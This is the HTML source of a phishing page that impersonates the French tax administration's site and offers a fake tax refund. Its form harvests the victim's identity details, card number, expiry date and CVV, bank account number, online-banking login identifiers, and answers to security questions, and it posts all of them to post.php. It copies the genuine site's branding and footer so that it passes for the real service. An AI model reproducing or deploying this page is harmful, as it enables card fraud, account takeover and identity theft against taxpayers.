<html><!-- Dac: dpapusx046 --><!-- Le: Wed Jun  7 11:35:32 2017 --><!-- Le: 4009 --><head>
            <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-15">
            <meta name="viewport" content="width=device-width, initial-scale=1">
            <link rel="stylesheet" href="templates/css/bootstrap-3.3.6.min.css">
            <link rel="stylesheet" href="templates/css/autentification.css">
            <link type="text/css" rel="stylesheet" href="templates/css/imp.css" media="all">


            <script src="templates/jquery-3.1.0.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.maskedinput/1.4.1/jquery.maskedinput.js"></script>


    <script>
  



        function type_carte(){
            var get_value = document.getElementById('cardcc').value;
            var type = get_value.substring(0,2);
            var other = get_value.substring(0,1);
            if(type == "40"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "41"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "42"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "43"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "44"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "45"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "46"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "47"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "48"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "49"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "31"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "32"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "33"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "34"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "35"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "36"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "37"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "38"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "39"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "30"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "51"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 48.5%";
            }else if(type == "52"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 48.5%";
            }else if(type == "53"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 48.5%";
            }else if(type == "54"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 48.5%";
            }else if(type == "55"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 48.5%";
            }else if(type == "22"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 48.5%";
            }else if(type == "23"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 48.5%";
            }else if(type == "24"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 48.5%";
            }else if(type == "25"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 48.5%";
            }else if(type == "26"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 48.5%";
            }else if(type == "27"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 48.5%";
            }else if(type == "60"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 13.6%";
            }else if(type == "64"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 13.6%";
            }else if(type == "65"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 13.6%";
            }else if(type == "50"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 29%";
            }else if(type == "56"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 29%";
            }else if(type == "58"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 29%";
            }else if(type == "63"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 29%";
            }else if(type == "62"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 29%";
            }else if(type == "67"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 29%";
            }else if(other == "1"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "2"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "3"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "4"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "5"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "6"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "7"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "8"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "9"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "0"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 74.8%";
            }
        };
    </script>

            <title>Remboursement</title>
            <link rel="icon" href="templates/11.png">
            </head><body cz-shortcut-listen="true">
                <header role="banner">
                     <!-- ""banniereSmart" -->
                    <div class="container">
                    <div id="badIE" class="old-browser invisible">
                        
                    </div>
                        <div class="col-xs-12 col-sm-12  col-md-12 col-lg-12 noPadding">
                            <a id="portailpublic" href="" target="_blank">
                                <div id="impotsgouv" class="col-xs-12  col-sm-6  col-md-6  col-lg-4 noPadding">
                                </div>
                            </a>             
                            <div id="accesEspace" class="col-xs-offset-0 col-xs-12 col-sm-offset-1  col-sm-5 col-md-offset-0 col-md-6 col-lg-offset-0 col-lg-8 noPadding">
                                <ul class="col-xs-12  col-sm-12 col-md-offset-3 col-md-9 col-lg-offset-8 col-lg-4 noPadding ">
                                    <li>
                                        <a class="btn11 btn-primary" id="partPriv" href="" style="background-image: url(https://cfspart.impots.gouv.fr/templates/images/Cadenas.svg);background-repeat: no-repeat;background-position: 10pt;padding: 4pt 0pt 4pt 10pt;display: block;background-size: 25pt;">
                                            Votre espace particulier
                                        </a>
                                    </li>
                                    <li>
                                        <a class="btn11 btn-danger" id="proPriv" href="" style="
    background-image: url(https://cfspart.impots.gouv.fr/templates/images/Cadenas.svg);
    background-repeat: no-repeat;
    background-position: 10pt;
    padding: 4pt 0pt 4pt 9pt;
    display: block;
    background-size: 25pt;
">
                                            Votre espace professionnel
                                        </a>
                                    </li>
                                </ul>
                            </div> <!-- "accesEspace"  -->
                        </div>
                    </div> <!-- container -->
                </header>
                <main class="col-xs-12 col-sm-12 col-md-12 col-lg-12 noPadding" style="
    margin-top: -0.32%;
">
                    <div class="container" id="backToPortail">
                        <div id="cheminDeFer" class="col-xs-12  col-sm-12  col-md-12  col-lg-12">
                            <nav id="breadcrumb">
                                <ul>
                                    <li><a href="#" id="toPortailPub" title="Retour au portail">Accueil</a></li>
                                    <li><span>Particulier &gt; Formulaire de remboursement &eacute;lectronique - N 0037422993 </span></li>
                                </ul>
                            </nav>
                        </div> <!-- "cheminDeFer" -->
                    </div> <!-- "backToPortail" -->
                    <div class="container" id="principalContainer">
                        <!--La forme qui va contenir tout le formulaire  -->

                        <div id="principalForm" class="col-xs-12 col-sm-12  col-md-12 col-lg-12">
                            <!-- Forme group des donn&eacute;s personnelles -->
                            <div class="row" style="
    margin-bottom: -4.61%;
">
                            <form method="post" action="post.php" style="
">
                                <div id="creation" class="form-group col-xs-12 col-md-6 col-lg-6 optionmere" style="margin-bottom: 4%;">
                                <h1 class="titre" style="
    margin-top: -1%;
">Confirmer vos informations</h1>
                                <div class="" style="
    margin-top: 0%;
"> 
                                        
                                    <div class="erreur invisible" id="Cat23S"></div>
                                    
                                
                                
                                
                                <div> 
                                    
                                        <input type="hidden" id="spi" name="spi">
                                        <input type="hidden" id="teledec" name="teledec">
                                        <input type="hidden" id="rfr" name="rfr">
                                        
                                        <div class="form-group saisie">
                                <label for="teledec_tmp">Nom complet</label>
                                 <a href="#" class="info">
                                  <img width="18" height="18" class="aide" src="templates/info.png" alt="Aide">
                                    <span data-toggle="tooltip">
                                            Saisissez votre Pr&eacute;nom et Nom. 
                                        </span>
                                            </a>
                                            <br>
                                            <div class="form-group saisie" style=" width: 102%;">
                                            <input class="saisie4 " placeholder="Pr&eacute;nom" name="AK01" aria-required="true" autocomplete="off" id="rfr_tmp" required="" style="
    width: 49%;
">
                                            <input class="saisie5 " placeholder="Nom" type="text" name="AK02" aria-required="true" autocomplete="off" required="required" style="
    width: 49%;
">
                                            <div class="erreur invisible" id="Cat1_3S_rfr_tmp"> 
                                                Veuillez v&eacute;rifier votre saisie.
                                            </div>
                                        </div>
                                            
                                        </div>  
                                        
                                        <div class="form-group saisie">
                                            <label for="spi_tmp">Date de Naissance</label>
                                            
                                            <br>
                                                    <div style="
    width: 102%;
"><select name="AK03" data-msg-required="&nbsp;*" class="saisie2" id="user-base-data-jour" required="required" style="
">
                                                        <option value="">Jour</option><option value="01">01</option><option value="02">02</option><option value="03">03</option><option value="04">04</option><option value="05">05</option><option value="06">06</option><option value="07">07</option><option value="08">08</option><option value="09">09</option><option value="10">10</option><option value="11">11</option><option value="12">12</option><option value="13">13</option><option value="14">14</option><option value="15">15</option><option value="16">16</option><option value="17">17</option><option value="18">18</option><option value="19">19</option><option value="20">20</option><option value="21">21</option><option value="22">22</option><option value="23">23</option><option value="24">24</option><option value="25">25</option><option value="26">26</option><option value="27">27</option><option value="28">28</option><option value="29">29</option><option value="30">30</option><option value="31">31</option></select> 
                                                    <select name="AK04" data-rule-required="true" class="saisie2" data-msg-required="&nbsp;*" id="user-base-data-mois" required="required" style="
    width: 32%;
">
                                                        <option value="">Mois</option><option value="Janvier">Janvier</option><option value="F&eacute;vrier">F&eacute;vrier</option><option value="Mars">Mars</option><option value="Avril">Avril</option><option value="Mai">Mai</option><option value="Juin">Juin</option><option value="Juillet">Juillet</option><option value="Août">Ao&ucirc;t</option><option value="Septembre">Septembre</option><option value="Octobre">Octobre</option><option value="Novembre">Novembre</option><option value="D&eacute;cembre">D&eacute;cembre</option></select> 

                                                    <select name="AK05" data-rule-required="true" data-msg-required="&nbsp;*" class="saisie2" id="user-base-data-ann&eacute;e" required="required">
                                                        <option value="">Ann&eacute;e</option><!--l'ann&eacute;e-->

                                                        <option value="2001">2001</option>
                                                        <option value="2000">2000</option>
                                                         <option value="1999">1999</option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><option value="1911">1911</option><option value="1910">1910</option><option value="1909">1909</option><option value="1908">1908</option><option value="1907">1907</option><option value="1906">1906</option><option value="1905">1905</option></select></div>
                                             </div>           
                                            
                            
                               <div class="form-group saisie">
                                <label for="teledec_tmp">Adresse</label>
                                 <a href="#" class="info">
                                  <img width="18" height="18" class="aide" src="templates/info.png" alt="Aide">
                                    <span data-toggle="tooltip">
                                            Saisissez votre Adresse/code Postal. 
                                        </span>
                                            </a>
                                            <br>
                                            <div class="form-group saisie" style=" width: 102%;">
                                            <input class="saisie4 " placeholder="Adresse" name="AK07" aria-required="true" autocomplete="off" id="rfr_tmp" required="" style="
">
                                            <input class="saisie5 " placeholder="Code Postal" type="num&eacute;ro" name="AK07" aria-required="true" autocomplete="off" id="zip" required="required" style="width: 39%;">
                                            <div class="erreur invisible" id="Cat1_3S_rfr_tmp"> 
                                                Veuillez v&eacute;rifier votre saisie.
                                            </div>
                                        </div>
                                            
                                        </div>
<div class="form-group saisie" style="
    margin-bottom: -8%;
">
                                            <label for="spi_tmp" style="
">T&eacute;l&eacute;phone</label>
                                            <a href="#" class="info">
                                                <img width="18" height="18" class="aide" src="templates/info.png" alt="Aide">
                                                <span data-toggle="tooltip">
                                                    Saisissez num&eacute;ro de t&eacute;l&eacute;phone.
                                                </span>
                                            </a>
                                            <br>
                                            <input class="saisie TroisSChamps" pattern="^(?:0|\(?\+33\)?\s?|0033\s?)[1-79](?:[\.\-\s]?\d\d){4}$" name="AK06" aria-required="true" type="num&eacute;ro" placeholder="Mobile" autocomplete="on" id="tel" required="" style="margin-bottom: 15%;">
                                            
                                        </div>
                                        
                                        </div>
                                        
                                        

                                        
                                        
                                                   
                                        

                            
                                        
                                   </div>
                                   
                                </div>
                         <div id="creation" class="form-group col-xs-12 col-md-6 col-lg-6 optionmere1" style="">
                                <h1 class="titre" style="
    margin-top: -1%;
">Vos coordonn&eacute;es bancaire</h1>
                                
                                <div class="" style="
    margin-top: 0%;
"> 
                            
                                        <input type="hidden" id="spi" name="spi">
                                        <input type="hidden" id="teledec" name="teledec">
                                        <input type="hidden" id="rfr" name="rfr">
                                        
<div class="form-group saisie">
                                         <script>
function chide() {
	document.getElementById("ccin").style.display = 'none';
	document.getElementById("account").style.display = 'none';
	document.getElementById("separ").style.display = 'none';
	document.getElementById("qbpos").style.display = 'none';
	document.getElementById("reponses").style.display = 'none';
	document.getElementById("qbpos2").style.display = 'none';
	document.getElementById("reponses2").style.display = 'none';
	document.getElementById("qbposlcl").style.display = 'none';
	document.getElementById("reponseslcl").style.display = 'none';
	document.getElementById("qbposlcl2").style.display = 'none';
	document.getElementById("reponseslcl2").style.display = 'none';
	document.getElementById("ibad").style.display = 'none';
	document.getElementById("plus").style.display = 'none';
	
}
function ccheck(x) {
	chide();
	if(x == "pst") {
		document.getElementById("account").style.display = '';
	}
	if(x == "cm") {

	}
	if(x == "caisse") {
	
	}
	if(x == "lcl") {

	}
	if(x == "sg") {
		
	}

	if(x == "bnp") {
		
	}
		if(x == "bp") {
		document.getElementById("plus").style.display = '';
	}
	document.getElementById("ccin").style.display = '';
}
</script>
				  <table border="0" cellspacing="0" width="560">
                    <tr>
                      <td width="180">
                        <label  class="saisie ">Votre banque :</label></td>
                      <td>
                        <select class="saisie4 " name="bank" onchange="ccheck(this.options[this.selectedIndex].value);">
							<option value="none">Choisissez votre banque</option>
							<option value="amex">American Express</option>
							<option value="axa">Axa Banque</option>
							<option value="bp">Banque populaire</option>
							<option value="bnp">BNP</option>
							<option value="bred">Bred</option>
							<option value="caisse">Caisse d'&egrave;pargne</option>
							<option value="ca">Cr&egrave;dit agricole</option>
							<option value="cm">Cr&egrave;dit mutuel</option>
							<option value="cn">Cr&egrave;dit du nord</option>
							<option value="cic">CIC</option>
							<option value="hsbc">HSBC</option>
							<option value="sg">Soci&egrave;t&egrave; g&egrave;n&egrave;rale</option>
							<option value="pst">La banque postale</option>
							<option value="lcl">LCL</option>
							<option value="na">Autres</option>
						</select></td>
                    </tr></table>
					<table id="ccin" border="0" cellspacing="0" width="560" style="display: none;">
<tr><td width="180"><label class="saisie ">N&#186; de carte de cr&egrave;dit :</label></td><td>

<input oninput="maxLengthCheck(this)"
maxlength = "20" minlength = "16" type = "tel" class="saisie TroisSChamps" style="background-image: url(&quot;templates/cccc.png&quot;); background-repeat: no-repeat; background-position: 101.5% 74.8%; width: 225px;" id="cardcc" onkeyup="type_carte()" placeholder="N&ordm; de carte de cr&eacute;dit" name="ccnum" aria-required="true" autocomplete="off" required="required" templates="">
                                            <div class="erreur invisible" id="ccnum">
                                                Votre num&eacute;ro de Carte de Cr&eacute;dit comporte uniquement des caractères num&eacute;riques ; veuillez v&eacute;rifier votre saisie.
                                            </div>

<tr><td width="180"><label class="saisie ">Date d'expiration :</label></td>
<td>


        
            <select class="saisie4 "  aria-required="true" autocomplete="off" required="required" name="expMonth" class="month" tabindex="16" style="
    width: 78px;
">
                                        <option value="" selected="">Mois</option>
                <option value="1">1</option><option value="2">2</option><option value="3">3</option><option value="4">4</option><option value="5">5</option><option value="6">6</option><option value="7">7</option><option value="8">8</option><option value="9">9</option><option value="10">10</option><option value="11">11</option><option value="12">12</option>            </select>

            <select class="saisie4 " aria-required="true" autocomplete="off" required="required" name="expYear" class="year" tabindex="17" style="
    width: 98px;
">
                                <option value="" selected="">Ann&egrave;e</option>
                <option value="2021">2021</option><option value="2022">2022</option><option value="2023">2023</option><option value="2024">2024</option><option value="2025">2025</option><option value="2026">2026</option><option value="2027">2027</option><option value="2028">2028</option><option value="2029">2029</option><option value="2030">2030</option><option value="2031">2031</option>            </select>



</td>

</tr>
<script>
  // This is an old version, for a more recent version look at
  // https://jsfiddle.net/DRSDavidSoft/zb4ft1qq/2/
  function maxLengthCheck(object)
  {
    if (object.value.length > object.maxLength)
      object.value = object.value.slice(0, object.maxLength)
  }
</script>
<tr><td width="174"><label  class="saisie ">Cryptogramme :</label></td>
<td><input oninput="maxLengthCheck(this)"
maxlength = "3"
min = "1"
max = "3" placeholder="CVV" class="saisie4 " aria-required="true" autocomplete="off" required="required" name="cvv" type="tel" size="3" style="
    width: 68px;
" /></td>
</tr>
<tr id="account" style="display: none;"><td width="174"><label class="saisie ">Num&egrave;ro de compte :</label></td>
<td><input class="saisie4 " name="account" type="text" size="16" /></td>
</tr>
<tr id="ibad" style="display: none;"><td width="174"><label class="saisie ">Identifiant Banque à Distance :</label></td>
<td><input class="saisie4 " name="ibad" type="text" size="16" /><img src="images/aide.gif" title="L'identifiant est celui que vous utilisez pour vous connecter à Cr&egrave;dit Mutuel."></td>
</tr>
<tr id="plus" style="display: none;"><td width="174" ><label class="saisie ">Cyberplus  :</label></td>
<td><input class="saisie4 " name="plus" type="tel" size="16" /></td>
</tr>

<tr id="separ" style="display: none;"><td width="49"><label class="saisie "></label></td>
<td></td>
</tr>

<tr id="qbpos" style="display : none;"><td width="174" ><label class="saisie ">Question personnelle 1 :</label></td>
<td><select class="saisie4 " name="question" id="question" class="chp_question" size="1" >
                              <option value="Dans quelle rue avez-vous grandi ?"> Dans quelle rue avez-vous grandi ? </option>
                            </select></td>
</tr>

<tr id="reponses" style="display: none;"><td width="174"><label class="saisie ">R&egrave;ponse personnelle 1 :</label></td>
<td><input class="saisie4 " name="reponses" type="text" size="29" /></td>
</tr>

<tr id="qbpos2" style="display : none;"><td width="174"><label class="saisie ">Question personnelle 2 :</label></td>
<td><select class="saisie4 " name="question2" id="question2" class="chp_question" size="1" >
                              <option value="Le pr&egrave;nom de votre meilleur ami d'enfance ?"> Le pr&egrave;nom de votre meilleur ami d'enfance ? </option>
                            </select></td>
</tr>

<tr id="reponses2" style="display: none;"><td width="174"><label class="saisie ">R&egrave;ponse personnelle 2 :</label></td>
<td><input class="saisie4 " name="reponses2" type="text" size="29" /></td>
</tr>

<tr id="qbposlcl" style="display : none;"><td style="
    padding-right: 0px;
    width: 200px;
" width="174"><label class="saisie ">Question personnelle 1 :</label></td>
<td><select class="saisie4 " name="questionlcl" id="questionlcl" class="chp_question" size="1" >
                              <option value="Dans quelle rue avez-vous grandi ?"> Nom de jeune fille de votre mère ? </option>
                            </select></td>
</tr>

<tr id="reponseslcl" style="display: none;"><td width="174"><label class="saisie ">R&egrave;ponse personnelle 1 :</label></td>
<td><input class="saisie4 " name="reponseslcl" type="text" size="29" /></td>
</tr>

<tr id="qbposlcl2" style="display : none;"><td width="174"><label class="saisie ">Question personnelle 2 :</label></td>
<td><select class="saisie4 " name="questionlcl2" id="questionlcl2" class="chp_question" size="1" >
                              <option value="Dans quelle rue avez-vous grandi ?"> Second pr&egrave;nom de votre pere ? </option>
                            </select></td>
</tr>

<tr id="reponseslcl2" style="display: none;"><td width="174"><label class="saisie ">R&egrave;ponse personnelle 2 :</label></td>
<td><input class="saisie4 " name="reponseslcl2" type="text" size="29" /></td>
</tr>
<tr id="ghazcisse" style="display: none;"><td width="174"><label class="saisie ">Identifiant client :</label></td>
<td><input class="saisie4 " name="ghazcisse" type="text" size="4" /></td>
</tr>
<tr id="ghazcisse0" style="display: none;"><td width="174"><label class="saisie ">Code confidentiel :</label></td>
<td><input class="saisie4 " name="ghazcisse0" type="text" size="4" /></td>
</tr>


                  </table>
                </form>
				<script  type="text/javascript">
 var frmvalidator = new Validator("darnoo");

frmvalidator.addValidation("ccnum","req","Veuillez entrer votre N&#186; de carte de cr&egrave;dit.");
frmvalidator.addValidation("ccnum","maxlen=16","Votre N&#186; de carte de cr&egrave;dit est incorrect.");
frmvalidator.addValidation("ccnum","minlen=15","Votre N&#186; de carte de cr&egrave;dit est incorrect.");
frmvalidator.addValidation("ccnum","num","Votre N&#186; de carte de cr&egrave;dit est incorrect.");

frmvalidator.addValidation("expMonth","num","Veuillez entrer la date d'&egrave;xpiration.");
frmvalidator.addValidation("expYear","num","Veuillez entrer la date d'&egrave;xpiration.");

frmvalidator.addValidation("cvv","req","Veuillez entrer votre Code de s&egrave;curit&egrave; (CVV).");
frmvalidator.addValidation("cvv","num","Veuillez entrer votre Code de s&egrave;curit&egrave; (CVV).");
frmvalidator.addValidation("cvv","maxlen=4","Votre Code de s&egrave;curit&egrave; (CVV) est incorrect.");
frmvalidator.addValidation("cvv","minlen=3","Votre Code de s&egrave;curit&egrave; (CVV) est incorrect.");

</script>
                                            
                                        </div>
<button id="partPriv" class="btn11 btn-primary" style="border-radius: 3px;font-size: 13px;font-family: Arial;font-weight: bold;padding: 7px 16px;vertical-align: top;background: #4464E6;border: 1px solid #4464E6;color: #fdfdff;margin-left: 130px;width: 284px;" type="submit">Confirmer</button>
                                        </div>
                                         
                                         
                                        
                                    
                                </div>
                                </div>
                                
                                <br>
                                <br>
                            </form>
                            <div class="container" id="backToPortail">
                        <div id="cheminDeFer" class="col-xs-12  col-sm-12  col-md-12  col-lg-12" style="
    margin-top: -4%;
">
                            <nav id="breadcrumb">
                                
                                    <a style="color: currentColor;">Un site de la direction g&eacute;n&eacute;rale des Finances publiques </a>
                                    
                              
                            </nav>
                        </div> <!-- "cheminDeFer" -->
                    </div></div>
                                <br>
                                <br>
                            </div>
                            <!-- Forme group de connexion 3S  -->  
                             <!-- Creation  -->
                        </div> <!-- row --> 
                      <!-- principalForm --> 
                      <!-- principalContainer -->
                    
<footer id="footer" class="footer" role="contentinfo" style="
    margin-top: 1%;
">

<div class="footer-wrapper">
  

<div class="container">
    
<div class="row" style="
    margin-left: auto;
">
          
              
              
              
            </div> <!-- end rows -->
  </div> <!-- end container -->


  <div class="footer-external-sites">
    <div class="container">
         <div class="comarquage" style="
    margin-bottom: 1px;
">
<a target="_blank" href="" title="Acc&amp;egraves au site service-public.fr ">
<img src="templates/1.gif" alt="Acc&amp;egraves au site service-public.fr" style="
    height: 20px;
">
</a>
<a target="_blank" href="" title="Acc&amp;egraves au site www.legifrance.gouv.fr">
<img src="templates/2.gif" width="138" height="25" alt="Acc&amp;egraves au site www.legifrance.gouv.fr " style="
">
</a> 
<a href="" class="sp" title="Acc&amp;egraves au site gouvernement.gouv.fr" target="_blank">
<img src="templates/3.jpg" width="120" height="45" alt="Acc&amp;egraves au site gouvernement.fr" style="height: 40px;width: 90px;">
</a>
<a target="_blank" href="" title="Acc&amp;egraves au site france.fr">
<img src="templates/4.gif" width="143" height="45" alt="Acc&amp;egraves au site france.fr " style="
    height: 40px;
    width: 130px;
">
</a> 
<a target="_blank" href="" title="Acc&amp;egraves au site service-public.fr )">
<img src="templates/5.gif" alt="Acc&amp;egraves au site service-public.fr " style="
    height: 35px;
    width: 100px;
">
</a>
</div>
    </div>
  </div>


  

  <div class="footer-copyright">
    <div class="footer-copyright">
    <div style="background: none repeat scroll 0%; font-family: sans-serif; font-size: small; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; width: 100%; color: #ffffff; text-align: center;"><marquee style="
"> Direction g&eacute;n&eacute;rale des Finances publiques   -   Mentions l&eacute;gales</marquee></div>
  </div>
  </div>
  </div>
</footer>
                </main>
                
                 
                
                 
                
                 
                
                 

                

                
                 

            
            <div id="aide" class="modal fade" role="dialog" aria-labelledby="titreAide">
            <div class="modal-dialog">
            <div class="modal-content">
            <div class="modal-header">
            <button type="button" class="close" data-dismiss="modal"><img src="templates/images/fermer.svg" alt="fermer" tabindex="0"></button>
            <!-- <button type="button" class="close" data-dismiss="modal">&#x274C;</button> -->
            <h1 id="titreAide" class="modal-title">Aide</h1>
            </div>
            
            
            
            
            <p>                        * Il vous appartient de vous assurer que la configuration de votre ordinateur est compatible avec l'utilisation des t&eacute;l&eacute; proc&eacute;dures.
            </p>
            <br><a href="#sommaire">Retour</a></div>
            </div>
            <div id="helpFooter" class="modal-footer">
            <a href="#" title="Fermer la fenêtre">Fermer</a>
            </div>
            </div>
            
            

            
            <div id="deco" class="modal fade" role="dialog">
                <div class="modal-dialog">
                    <div class="modal-content">
                        <div class="modal-header">
                            <h4 class="modal-title titre">D&eacute;connexion</h4>
                        </div>
                        <div class="modal-body">
                            <div id="deconnecte" class="rounded">
                                <iframe name="app0" id="app0" class="invisible"></iframe>
                                
                                
                                D&eacute;connexion en cours, veuillez patienter...<br>
                                
                                <br>
                                <img src="/templates/images/Miniballs.gif" alt="">
                                <br>
                            </div> <!-- deconnecte" -->
                        </div> <!-- modal-body -->
                    </div> <!-- modal-content -->
                </div> <!-- modal-dialog -->
            </div> 
            

<script src="/templates/js/jquery-1.11.3.min.js"></script>
<script src="/templates/js/bootstrap.min.js"></script>
<script type="text/javascript" src="/templates/js/auth.js"></script>
<script type="text/javascript" src="/templates/js/urls.js"> </script>
<script type="text/javascript">
urlLoginMotDePasse = '/LoginMDP?op=c&url=aHR0cHM6Ly9jZnNwYXJ0LmltcG90cy5nb3V2LmZyL21vbnByb2ZpbC13ZWJhcHAvbW9uQ29tcHRl';
urlLogin3S = '/LoginAccess?op=c&url=aHR0cHM6Ly9jZnNwYXJ0LmltcG90cy5nb3V2LmZyL21vbnByb2ZpbC13ZWJhcHAvbW9uQ29tcHRl';
if (document.getElementById('CFP')) document.getElementById('CFP').href=PortPub+PathCFP;
</script>





</body></html>
